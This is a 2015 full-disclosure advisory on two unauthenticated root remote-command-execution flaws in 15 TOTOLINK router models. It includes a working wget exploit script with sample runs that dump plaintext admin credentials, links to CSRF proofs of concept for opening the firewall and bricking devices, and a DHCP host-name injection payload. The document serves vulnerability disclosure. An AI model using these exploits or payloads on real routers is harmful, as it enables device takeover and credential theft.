15 TOTOLINK Routers Remote Command Execution

`Hash: SHA512  
  
## Advisory Information  
  
Title: 15 TOTOLINK router models vulnerable to multiple RCEs  
Advisory URL: https://pierrekim.github.io/advisories/2015-totolink-0x00.txt  
Blog URL: https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html  
Date published: 2015-07-16  
Vendors contacted: None  
Release mode: 0days, Released  
CVE: no current CVE  
  
  
  
## Product Description  
  
TOTOLINK is a brother brand of ipTime which wins over 80% of SOHO  
markets in South Korea.  
TOTOLINK produces routers routers, wifi access points and network  
devices. Their products are sold worldwide.  
  
  
  
## Vulnerabilities Summary  
  
The first vulnerability allows to bypass the admin authentication and  
to get a direct RCE from the LAN side with a single HTTP request.  
  
The second vulnerability allows to bypass the admin authentication and  
to get a direct RCE from the LAN side with a single DHCP request.  
  
There are direct RCEs against the routers which give a complete root  
access to the embedded Linux from the LAN side.  
  
The two RCEs affect 13 TOTOLINK products from 2009-era firmwares to  
the latest firmwares with the default configuration:  
  
- TOTOLINK A1004 : until last firmware (9.34 - za1004_en_9_34.bin)  
- TOTOLINK A5004NS : until last firmware (9.38 - za5004s_en_9_38.bin)  
- TOTOLINK EX300 : until last firmware (8.68 - TOTOLINK EX300_8_68.bin  
- totolink.net)  
- TOTOLINK EX300 : until last firmware (9.36 -  
ex300_ch_9_36.bin.5357c0 - totolink.cn)  
- TOTOLINK N150RB : until last firmware (9.08 - zn150rb_en_9_08.bin.5357c0)  
- TOTOLINK N300RB : until last firmware (9.26 - zn300rb_en_9_26.bin)  
- TOTOLINK N300RG : until last firmware (8.70 - TOTOLINK N300RG_8_70.bin)  
- TOTOLINK N500RDG : until last firmware (8.42 - TOTOLINK N500RDG_en_8_42.bin)  
- TOTOLINK N600RD : until last firmware (8.64 - TOTOLINK N600RD_en_8_64.bin)  
- TOTOLINK N302R Plus V1 : until the last firmware 8.82 (TOTOLINK  
N302R Plus V1_en_8_82.bin)  
- TOTOLINK N302R Plus V2 : until the last firmware 9.08 (TOTOLINK  
N302R Plus V2_en_9_08.bin)  
- TOTOLINK A3004NS (no firmware available in totolinkusa.com but  
ipTIME's A3004NS model was vulnerable to the 2 RCEs)  
- TOTOLINK EX150 : until the last firmware (8.82 - ex150_ch_8_82.bin.5357c0)  
  
  
The DHCP RCE also affects 2 TOTOLINK products from 2009-era firmwares  
to the latest firmwares with the default configuration:  
  
- TOTOLINK A2004NS : until last firmware (9.60 - za2004s_en_9_60.bin)  
- TOTOLINK EX750 : until last firmware (9.60 - ex750_en_9_60.bin)  
  
  
Firmwares come from totolink.net and from totolink.cn.  
  
- - From my tests, it is possible to use these vulnerabilities to  
overwrite the firmware with a custom (backdoored) firmware.  
  
Concerning the high CVSS score (10/10) of the vulnerabilities and the  
longevity of this vulnerability (6+ year old),  
the TOTOLINK users are urged to contact TOTOLINK.  
  
  
  
## Details - RCE with a single HTTP request  
  
The HTTP server allows the attacker to execute some CGI files.  
  
Many of them are vulnerable to a command inclusion which allows to  
execute commands with the http daemon user rights (root).  
  
  
Exploit code:  
  
$ cat totolink.carnage  
#!/bin/sh  
if [ ! $1 ]; then  
echo "Usage:"  
echo $0 ip command  
exit 1  
fi  
wget -qO- --post-data="echo 'Content-type:  
text/plain';echo;echo;PATH=$PATH:/sbin $2 $3 $4" http://$1/cgi-bin/sh  
  
  
The exploits have been written in HTML/JavaScript, in form of CSRF  
attacks, allowing people to test their systems in live using their  
browsers:  
http://pierrekim.github.io/advisories/  
  
  
o Listing of the filesystem  
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-listing.of.the.filesystem.html  
  
Using CLI:  
  
root@kali:~/totolink# ./totolink.carnage 192.168.1.1 ls | head  
ash  
auth  
busybox  
cat  
chmod  
cp  
d.cgi  
date  
echo  
false  
root@kali:~/totolink#  
  
  
o How to retrieve the credentials ? (see login and password at the end  
of the text file)  
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-dump.configuration.including.credentials.html  
  
Using CLI:  
  
kali# ./totolink.carnage 192.168.1.1 cat /tmp/etc/iconfig.cfg  
wantype.wan1=dynamic  
dhblock.eth1=0  
ppp_mtu=1454  
fakedns=0  
upnp=1  
ppp_mtu=1454  
timeserver=time.windows.com,gmt22,1,480,0  
wan_ifname=eth1  
auto_dns=1  
dhcp_auto_detect=0  
wireless_ifmode+wlan0=wlan0,0  
dhcpd=0  
lan_ip=192.168.1.1  
lan_netmask=255.255.255.0  
dhcpd_conf=br0,192.168.1.2,192.168.1.253,192.168.1.1,255.255.255.0  
dhcpd_dns=164.124.101.2,168.126.63.2  
dhcpd_opt=7200,30,200,  
dhcpd_configfile=/etc/udhcpd.conf  
dhcpd_lease_file=/etc/udhcpd.leases  
dhcpd_static_lease_file=/etc/udhcpd.static  
use_local_gateway=1  
login=admin  
password=admin  
  
Login and password are stored in plaintext, which is a very bad  
security practice.  
  
  
o Current running process:  
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-current.process.html  
  
Using CLI:  
  
kali# ./totolink.carnage 192.168.1.1 ps -auxww  
  
  
o Getting the kernel memory:  
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-getting.kernel.memory.html  
  
Using CLI:  
  
kali# ./totolink.carnage 192.168.1.1 cat /proc/kcore  
  
  
o Default firewall rules:  
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-default.firewall.rules.html  
  
Using CLI:  
  
kali# ./iptime.carnage.l2.v9.52 192.168.1.1 iptables -nL  
  
  
o Opening the management interface on the WAN:  
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-opening.the.firewall.html  
  
  
o Reboot the device:  
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-reboot.html  
  
  
o Brick the device:  
  
HTML/JS exploits:  
  
http://pierrekim.github.io/advisories/2015-totolink-0x00-PoC-bricking.the.device.html  
  
  
An attacker can use the /usr/bin/wget binary located in the file  
system of the remote device to plant a backdoor and then execute it as  
root.  
  
By the way, d.cgi in /bin/ is an intentional backdoor.  
  
  
  
## Details - RCE with a single DHCP request  
  
This vulnerability is the exact inverse of CVE-2011-0997. The DHCPD  
server in TOTOLINK devices allows remote attackers to execute  
arbitrary commands  
via shell metacharacters in the host-name field.  
  
Sending a DHCP request with this parameter will reboot the device:  
  
cat /etc/dhcp/dhclient.conf  
  
send host-name ";/sbin/reboot";  
  
When connecting to the UART port (`screen /dev/ttyUSB0 38400`), we  
will see the stdout of the /dev/console device;  
the dhcp request will immediately force the reboot of the remote device:  
  
  
Booting...  
  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
@  
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize  
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h  
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName  
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16  
@  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
  
[...]  
WiFi Simple Config v1.12 (2009.07.31-11:35+0000).  
  
Launch iwcontrol: wlan0  
Reaped 317  
iwcontrol RUN OK  
SIGNAL -> Config Update signal progress  
killall: pppoe-relay: no process killed  
SIGNAL -> WAN ip changed  
WAN0 IP: 192.168.2.1  
signalling START  
Invalid upnpd exit  
killall: upnpd: no process killed  
upnpd Restart 1  
iptables: Bad rule (does a matching rule exist in that chain?)  
Session Garbage Collecting:Maybe system time is updated.( 946684825 0 )  
Update Session timestamp and try it after 5 seconds again.  
ez_ipupdate callback --> time_elapsed: 0  
Run DDNS by IP change: / 192.168.2.1  
Reaped 352  
iptables: Bad rule (does a matching rule exist in that chain?)  
Jan 1 00:00:25 miniupnpd[370]: Reloading rules from lease file  
Jan 1 00:00:25 miniupnpd[370]: could not open lease file: /var/run/upnp_pmlist  
Jan 1 00:00:25 miniupnpd[370]: HTTP listening on port 2048  
Reaped 363  
Led Silent Callback  
Turn ON All LED  
Dynamic Channel Search for wlan0 is OFF  
start_signal => plantynet_sync  
Do start_signal => plantynet_sync  
SIGNAL -> Config Update signal progress  
killall: pppoe-relay: no process killed  
SIGNAL -> WAN ip changed  
Reaped 354  
iptables: Bad rule (does a matching rule exist in that chain?)  
ez_ipupdate callback --> time_elapsed: 1  
Run DDNS by IP change: / 192.168.2.1  
Burst DDNS Registration is denied: iptime -> now:26  
Led Silent Callback  
Turn ON All LED  
/proc/sys/net/ipv4/tcp_syn_retries: cannot create  
- - - ---> Plantynet Event : 00000003  
- - - ---> PLANTYNET_SYNC_INTERNET_BLOCK_DEVICE  
  
  
[sending the DHCP request]  
  
  
[01/Jan/2000:00:01:03 +0000] [01/Jan/2000:00:01:03 +0000] Jan 1  
00:01:03 miniupnpd[370]: received signal 15, good-bye  
Reaped 392  
Reaped 318  
Reaped 314  
Reaped 290  
Reaped 288  
Reaped 268  
Reaped 370  
Reaped 367  
- - - ---> PLANTYNET_SYNC_FREE_DEVICE  
Restarting system.  
  
Booting...  
  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
@  
@ chip__no chip__id mfr___id dev___id cap___id size_sft dev_size chipSize  
@ 0000000h 0c84015h 00000c8h 0000040h 0000015h 0000000h 0000015h 0200000h  
@ blk_size blk__cnt sec_size sec__cnt pageSize page_cnt chip_clk chipName  
@ 0010000h 0000020h 0001000h 0000200h 0000100h 0000010h 000004eh GD25Q16  
@  
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@  
Reboot Result from Watchdog Timeout!  
  
- - - ---RealTek(RTL8196E)at 2012.07.06-04:36+0900 v0.4 [16bit](400MHz)  
Delay 1 second till reset button  
Magic Number: raw_nv 00000000  
Check Firmware(05020000) : size: 0x001ddfc8 ---->  
  
  
[...]  
  
  
An attacker can use the /usr/bin/wget binary located in the file  
system of the remote device to plant a backdoor and then execute it as  
root.  
  
  
  
## Vendor Response  
  
Due to "un-ethical code" found in TOTOLINK products (= backdoors found  
in new TOTOLINK devices), TOTOLINK was not contacted in regard of this  
case, but ipTIME was contacted in April 2015 concerning the first RCE.  
  
  
  
## Report Timeline  
  
* Jun 01, 2014: First RCE found by Pierre Kim and Alexandre Torres in  
ipTIME products.  
* Jun 02, 2014: Second RCE found by Pierre Kim in ipTIME products.  
* Jun 25, 2015: Similar vulnerabilities found in TOTOLINK products.  
* Jul 13, 2015: TOTOLINK silently fixed the HTTP RCE in A2004NS and  
EX750 routers.  
* Jul 13, 2015: Updated firmwares confirmed vulnerable.  
* Jul 16, 2015: A public advisory is sent to security mailing lists.  
  
  
  
## Credit  
  
These vulnerabilities were found by Alexandre Torres and Pierre Kim  
(@PierreKimSec).  
  
  
  
## References  
  
https://pierrekim.github.io/advisories/2015-totolink-0x00.txt  
https://pierrekim.github.io/blog/2015-07-16-15-TOTOLINK-products-vulnerable-to-multiple-RCEs.html  
  
  
  
## Disclaimer  
  
This advisory is licensed under a Creative Commons Attribution Non-Commercial  
Share-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1  
  
iQIcBAEBCgAGBQJVpqxVAAoJEMQ+Dtp9ky28pugQAK3sy8Y9AHZdMtSGN9NdJvMn  
ZJkMi/LuvwVUCDnJ3C0ARNGlYliRRwznf6DxpKIMIAwrsAFRl/Pm/Vtko90a7lZd  
njY2av8ezydFAzVo6+c7M0LXLDCyfTKNIhqtAgGmWYhrgRGZfUSUqJmifz3zJjme  
yF+IU6Jj09Yfp3QbKw3dtiujX1GuyXCJaXjvZg717wxG+bDvCY0Y2rCfNMPh8oRz  
7H0kPukbKo1eT0e+kU9lz/AzaBa8RdQ64SE/Cmji2wMZDnBj2jgG8sTxj4IZcMF/  
m7jxJRwp1yKf7/6+KmSeXZPfZd+Z/j2rSnAsGRqyq0gVdunS2MiLX2VeTDacdrME  
U4+h+6KIcE35S/FKAnLqevCFxLLisDdlzviO3QCXTPoVc7l1W+9lCHiCaqW59jWg  
0iQp7vF59SV0HADDHpLinEs5cjP2wHDLJ8SqAFa45//Q8FKty5t5w6F0VTxyGa8F  
Jwu+BNv0gXbKnUTEuJO5zH9scqW2ivMKEaj8+mKA9xwxTf5z8tMX2bBa50u4lpjH  
m97UoM05n6Ticph89U+0CvMUMea9nR5NdPHLR2uuwEhvaE4n4fUhWqsfCuZPXG5O  
IEckx7qZIfqiL8j1QjdqIaXQlspquzed9LJWGDm43oZFJQRq1dnldlm6JXw5Ydka  
Tnzx5ebfTpvioOs00bdc  
=5OT/  
-----END PGP SIGNATURE-----  
  
--   
Pierre Kim  
[email protected]  
@PierreKimSec  
https://pierrekim.github.io/  
`